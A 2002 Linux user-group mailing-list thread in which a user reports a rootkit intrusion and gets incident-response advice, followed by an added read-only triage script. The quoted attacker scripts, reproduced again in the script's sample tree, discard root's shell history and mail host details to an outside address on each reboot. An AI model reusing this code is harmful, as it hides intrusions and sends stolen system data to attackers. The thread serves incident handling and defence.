[lug] i got hacked

Scott A. Herod herod at interact-tv.com
Thu Apr 18 15:54:12 MDT 2002


Document the intrusion as much as possible.

Unplug the network cable.
Wipe it.
Reload everything.
Set up an iptables or ipchains firewall.
Run said firewall.
Plug the network cable back in.

Contact the FBI.  ( Scary option.  I'd be afraid they might
charge you with destruction of evidence for wiping the box.
That is if they even care to respond. )

Seriously, I have an ipchains firewall on the ppp port on my
home machine.  I see scans within 5 minutes of dialing up
my ISP.  ( I tend to run several services for other machines
on my home network but those all talk through eth0.  Nothing
but udp nameservice and auth is allowed in through my ppp
interface. )

Scott

j davis wrote:
> 
> i have a box at a place i do contract work about 2 days a month.
> today i could not ssh to it. so i went on site and discovered i got
> hacked...like a dummy i didn't have tcp wrappers on or a firewall . i think
> they exploited wu-ftpd
> ..i use redhat 7.1 with wu-ftpd 2.6.1-20...i haven't got around to upgrading
> yet.
> anyway here is what i found in /etc/rc3.d/S52remote
> 
> #!/bin/sh
> 
> rm -rf /root/.bash_history
> ln -s /dev/null /root/.bash_history
> 
> cd /dev
> ./ryz -f ./s
> /etc/rc.d/init.d/sshd stop
> cd /
> 
> /usr/bin/trimite
> 
> then here is /usr/bin/trimite
> 
> #!/bin/sh
> 
> echo "* Info : $(uname -a)" >> /tmp/info
> echo "* Hostname : $(hostname -f)" >> /tmp/info
> echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> echo "* Uptime : $(uptime)" >> /tmp/info
> echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> echo "* Spatiu Liber: $(df -h)" >> /tmp/info
> echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> echo "* Portul rootkitului este 25897" >> /tmp/info
> cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> rm -f /tmp/info
> 
> so, netstat says i have something listening on 25897...what should i do?!
> never been hacked before....i already turned off ftp and turned on tcp
> wrappers.
> 
> help please
> jd
> 
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
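Scott's first step is to document the intrusion before touching the box. As an added example (not code from either poster), here is a read-only triage script that looks for exactly the artifacts jd quoted: root's history symlinked to /dev/null, the S52remote start script, the /usr/bin/trimite beacon, an executable dropped into /dev, and a TCP listener on 25897. It runs against a mounted image or copy of the suspect filesystem (the ROOT argument), changes nothing under it, and the sample tree and netstat excerpt it builds are constructed to match the post.

```shell
#!/bin/sh
# Added example, not part of the thread: read-only triage of a suspect root
# filesystem for the artifacts quoted in the post. Nothing under $root is
# modified, so the evidence survives until the box is wiped. The sample tree
# and netstat output below are constructed to mirror what jd reported.

triage_root() {
    root="$1"
    findings=0

    # Attacker-installed symlink that discards root's shell history.
    if [ -L "$root/root/.bash_history" ]; then
        echo "FINDING: /root/.bash_history -> $(readlink "$root/root/.bash_history")"
        findings=$((findings + 1))
    fi

    # Start scripts that cd into /dev, run a binary from there, stop sshd,
    # or call the trimite mailer: the pattern of the posted S52remote.
    for f in "$root"/etc/rc*.d/S* "$root"/etc/rc.d/rc*.d/S*; do
        [ -f "$f" ] || continue
        if grep -qE 'cd /dev|\./[A-Za-z0-9_]+ -f|/usr/bin/trimite|sshd stop' "$f"; then
            echo "FINDING: suspicious start script ${f#$root}"
            findings=$((findings + 1))
        fi
    done

    # The beacon that mails system details out after every reboot.
    if [ -f "$root/usr/bin/trimite" ] && grep -q 'mail -s' "$root/usr/bin/trimite"; then
        echo "FINDING: /usr/bin/trimite mails system info out"
        findings=$((findings + 1))
    fi

    # /dev should hold device nodes, not executable regular files like ryz.
    # (A for loop rather than a piped while, so the counter is not lost in a subshell.)
    for b in $(find "$root/dev" -type f -perm -100 2>/dev/null); do
        echo "FINDING: executable regular file in /dev: ${b#$root}"
        findings=$((findings + 1))
    done

    echo "TOTAL $findings"
}

# Read "netstat -an" style output on stdin; report a TCP listener on PORT.
check_listener() {
    port="$1"
    hits=$(grep -E "[:.]${port}[[:space:]]+[^[:space:]]+[[:space:]]+LISTEN" || true)
    if [ -n "$hits" ]; then
        printf 'FINDING: listener on port %s\n%s\n' "$port" "$hits"
        return 0
    fi
    return 1
}

# Constructed sample tree reproducing the artifacts from the post.
build_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/root" "$root/dev" "$root/etc/rc3.d" "$root/usr/bin"
    ln -s /dev/null "$root/root/.bash_history"
    printf '#!/bin/sh\n/sbin/ifup eth0\n' > "$root/etc/rc3.d/S10network"   # benign
    cat > "$root/etc/rc3.d/S52remote" <<'EOF'
#!/bin/sh
rm -rf /root/.bash_history
ln -s /dev/null /root/.bash_history
cd /dev
./ryz -f ./s
/etc/rc.d/init.d/sshd stop
/usr/bin/trimite
EOF
    cat > "$root/usr/bin/trimite" <<'EOF'
#!/bin/sh
echo "* Info : $(uname -a)" >> /tmp/info
cat /tmp/info | mail -s "root dupa reboot" ryz_ro@yahoo.com
rm -f /tmp/info
EOF
    : > "$root/dev/ryz" && chmod 755 "$root/dev/ryz"
    echo "$root"
}

# Constructed "netstat -an" excerpt matching the listener jd saw.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:25897           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
udp        0      0 0.0.0.0:53              0.0.0.0:*'

sample=$(build_sample_tree)
triage_root "$sample"
printf '%s\n' "$SAMPLE_NETSTAT" | check_listener 25897
rm -rf "$sample"
```

Run it against a copy of the disk rather than the live system: the rootkit's start script already stops sshd and replaces binaries, so output from tools on the compromised host itself cannot be trusted, and the findings list is the record to keep before wiping and reloading.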
